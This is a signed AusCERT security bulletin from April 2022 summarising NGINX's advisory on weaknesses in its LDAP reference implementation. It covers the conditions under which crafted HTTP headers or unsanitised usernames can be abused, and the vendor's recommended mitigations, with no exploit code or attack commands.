Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT Security Bulletin ASB-2022.0086.3 NGINX Zero-Day 14 April 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Nginx Zero-Day Operating System: UNIX variants (UNIX, Linux, OSX) Windows Resolution: Mitigation Revision History: April 14 2022: Re-formatting April 13 2022: Formatting April 13 2022: Initial Release OVERVIEW A new zero-day vulnerability in the Nginx web server has been claimed by hacktivist group called "Against the West" allowing remote code execution on a vulnerable system.[3] NGINX confirmed security vulnerabilities in the NGINX LDAP reference implementation only. "NGINX Open Source and NGINX Plus are not themselves affected, and no corrective action is necessary if you do not use the reference implementation."[1] NGINX noted in its advisory that it is published as a reference implementation and is not a production-grade LDAP solution. "For example, there is no encryption of the username and password used for the sample login page, and security notices call this out."[3] Currently the hacktivist group informed their findings to NGINX team and are looking for reward but they also mentioned that they have been offered significant amounts from other interested groups for the exploit[4]. IMPACT NGINX determined that only the reference implementation is affected and also there are conditions for the exploit. "When configuration parameters are specified on the command line, an attacker can override some or all of them by passing specially crafted HTTP request headers."[1] These are the conditions for the exploit[1]: 1. Command-line parameters are used to configure the Python daemon 2. There are unused, optional configuration parameters 3. LDAP authentication depends on specific group membership MITIGATION NGINX suggested these mitigations: Mitigating Condition 1: Command-Line Parameters Are Used to Configure the Python Daemon When configuration parameters are specified on the command line, an attacker can override some or all of them by passing specially crafted HTTP request headers. To protect against this, ensure that the corresponding configuration parameters have an empty value in the location = /auth-proxy block in the NGINX configuration (nginx-ldap-auth.conf in the repo)[1]. Mitigating Condition 2: Unused, Optional Configuration Parameters As in Condition 1, an attacker can pass specially crafted HTTP request headers to override certain configuration parameters, depending on the configuration used for the LDAP search template. To protect against this, ensure that any unused, optional parameters have an empty value in the location = /auth-proxy block in the NGINX configuration[1]. Mitigating Condition 3: LDAP Group Membership Is Required The Python daemon does not sanitize its inputs. To mitigate against this, ensure that the backend daemon that presents the login form strips any special characters from the username field. In particular, it must remove the opening and closing parenthesis characters - ( ) - and the equal sign (=), which all have special meaning for LDAP servers. The backend daemon in the LDAP reference implementation will be updated in this way in due course[1]. REFERENCES [1] Addressing Security Weaknesses in the NGINX LDAP Reference Implementation https://www.nginx.com/blog/addressing-security-weaknesses-nginx-ldap-reference-implementation/ [2] Nginx Zero-Day RCE Vulnerability Alert https://securityonline.info/nginx-zero-day-rce-vulnerability-alert/ [3] Is there a 0day in NGINX? F5 investigates claims, finds LDAP issues https://thestack.technology/nginx0-day-claims/ [4] NginxDay https://github.com/AgainstTheWest/NginxDay AusCERT has made every effort to ensure that the information contained in this document is accurate. However, the decision to use the information described is the responsibility of each user or organisation. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYldMtONLKJtyKPYoAQh5/Q//aOBO5bfpEUidaXJwIcdSumm9thOoUPDf V56Am+WBZgZGPUrU+g0YLunGV4f8vvQrujfKF6M6XdrTqcRmm5ikdMeuWcpuDL0v ZT292akonXlDMYjzpPPEW/n5iJXa4Cdtak1KEUM1VNEZc0Zd8R6jMRN07eIGXruo p0ihV062JUTP4+1Z3t6pdkeWIv8IvDzyINXsoP2JMmLtntrTaHeY7cf4dzFKwOEA /3lNZSTCQM+zBAjUQtcpZ9e83nMy6ShU4TGZ3hva2UyNH7H+NGJbAe7pRtBe0YqX EPgNZN1Auh+5HR2jVTwYbFucXNVhvXsD89Crs96yC9w2iAOE8rnLidW7C1Db2U+X UmltsDgPcwnaS9uBAKqVqHoWJM2o4RuDIdeekJJ60bIUl+XVYg6zBw3HKAFdrFZy s8hqayogc+112+AhCvo9buErzCVfjpN+9w5BzSXM7oct8xZPk9aDOdA/RkGkuZ6Z gi44/i+nNBZ3a3aOd2/rS0P4wZkk6i7mBOhshUhezpYdyc56qwyyoNwxefQ+YMye LGAin8mi1vCEgyJ5dKLxLrv0XTUFo8JMc0gKJGhpPgxCmHmQbDpRVrOJgRUNnjQQ 670MgXDwWmwG8fUg9ju/xn76x9VGNEFs3/X9qdvpvyHPvlnzDsB7/U9ovwwdb9RH LkBoQL2B5zM= =POtm -----END PGP SIGNATURE-----